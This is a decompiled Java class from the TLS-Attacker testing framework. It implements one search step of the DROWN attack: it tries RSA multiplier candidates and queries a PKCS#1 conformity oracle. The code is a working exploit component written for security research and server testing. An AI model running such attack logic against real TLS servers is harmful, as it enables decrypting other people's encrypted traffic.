/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl.drown;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.ExtraClearDrownOracle;
import java.math.BigInteger;
import java.util.concurrent.Callable;

class ExtraClearStep2Callable
implements Callable<BigInteger> {
    private ExtraClearDrownOracle oracle;
    private byte[] shiftedOldCiphertext;
    private int l_m;
    private BigInteger e;
    private BigInteger N;
    private BigInteger sCandidate;
    private BigInteger sCandidateStep;
    private BigInteger sMax;
    private BigInteger shiftedOldPlaintext;

    public ExtraClearStep2Callable(ExtraClearDrownOracle oracle, byte[] shiftedOldCiphertext, int l_m, BigInteger e, BigInteger N, BigInteger initialSCandidate, BigInteger sCandidateStep, BigInteger shiftedOldPlaintext) {
        this.oracle = oracle;
        this.shiftedOldCiphertext = shiftedOldCiphertext;
        this.l_m = l_m;
        this.e = e;
        this.N = N;
        this.sCandidate = initialSCandidate;
        this.sCandidateStep = sCandidateStep;
        this.shiftedOldPlaintext = shiftedOldPlaintext;
        this.sMax = BigInteger.valueOf(2L).modPow(BigInteger.valueOf(30L), N);
    }

    @Override
    public BigInteger call() {
        while (this.sCandidate.compareTo(this.sMax) <= 0) {
            byte[] plaintextCandidate;
            do {
                if (Thread.currentThread().isInterrupted()) {
                    return null;
                }
                this.sCandidate = this.sCandidate.add(this.sCandidateStep);
            } while ((plaintextCandidate = ArrayConverter.bigIntegerToByteArray((BigInteger)this.shiftedOldPlaintext.multiply(this.sCandidate).mod(this.N), (int)this.l_m, (boolean)false)).length > this.l_m || plaintextCandidate[0] != 0 || plaintextCandidate[1] != 2);
            byte[] cipertextCandidate = ArrayConverter.bigIntegerToByteArray((BigInteger)this.sCandidate.modPow(this.e, this.N).multiply(new BigInteger(this.shiftedOldCiphertext)).mod(this.N), (int)this.l_m, (boolean)true);
            if (!this.oracle.checkPKCSConformity(cipertextCandidate)) continue;
            return this.sCandidate;
        }
        return null;
    }
}

